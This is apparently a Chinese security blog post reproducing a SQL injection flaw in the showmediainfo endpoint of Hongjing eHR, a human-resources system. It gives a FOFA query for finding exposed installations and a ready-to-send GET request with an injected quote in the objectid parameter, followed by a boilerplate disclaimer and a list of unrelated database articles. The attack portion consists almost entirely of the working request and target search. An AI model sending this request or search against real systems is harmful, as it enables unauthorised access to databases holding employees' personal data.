【漏洞复现】宏景eHR showmediainfo SQL注入漏洞

0x01 产品简介

北京宏景世纪软件股份有限公司(简称"宏景软件")专注于国有企事业单位人力与人才管理数智化(数字化、智能化)产品的研发和应用推广。

0x02 漏洞概述

宏景eHR /workbench/duty/showmediainfo接口存在SQL注入漏洞,攻击者可以通过该漏洞构造sql语句获取数据库信息。

0x03 测绘语句

复制代码
宏景eHR

0x04 漏洞复现

复制代码
GET /workbench/duty/showmediainfo?kind=0&usernumber=1MV8sCtnMcsZFzLhJXUMPAATTP2HJFPAATTPVIRoUrFdir1XVNthrak35kPAATTP3HJDPAATTP&planid=1&objectid=1' HTTP/1.1

0x05 影响范围

复制代码
fofa: app="HJSOFT-HCM"

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
秦歌6669 分钟前
Agent Skills详解
服务器·前端·数据库
Mahir0812 分钟前
Redis 分布式锁与 Redisson 深度解析:从原生实现到工业级解决方案
数据库·redis·分布式·缓存·面试
杨云龙UP13 分钟前
MySQL主库高峰期备份引发504故障:从库手动切换接管 + 主从恢复同步 + Docker版DB2重启实战_2026-05-17
linux·运维·数据库·mysql·docker·容器·centos
倔强的石头_16 分钟前
彻底告别Row-By-Row:标量子查询外连接改写与向量化引擎深潜
数据库
2301_8092445317 分钟前
如何解决宝塔面板磁盘空间占满问题_使用磁盘清理工具清理
jvm·数据库·python
六月雨滴21 分钟前
Oracle 数据库网络安全
数据库·安全·dba
En^_^Joy23 分钟前
Django模型:数据库操作全指南
数据库·django·sqlite
六月雨滴25 分钟前
Oracle 数据库网络安全之加密配置
数据库·web安全·oracle
2401_8676239827 分钟前
如何设置用户默认表空间_ALTER USER DEFAULT TABLESPACE
jvm·数据库·python
callJJ31 分钟前
SQL 调优完全指南 —— 从入门到实战
数据库·sql·调优·慢查询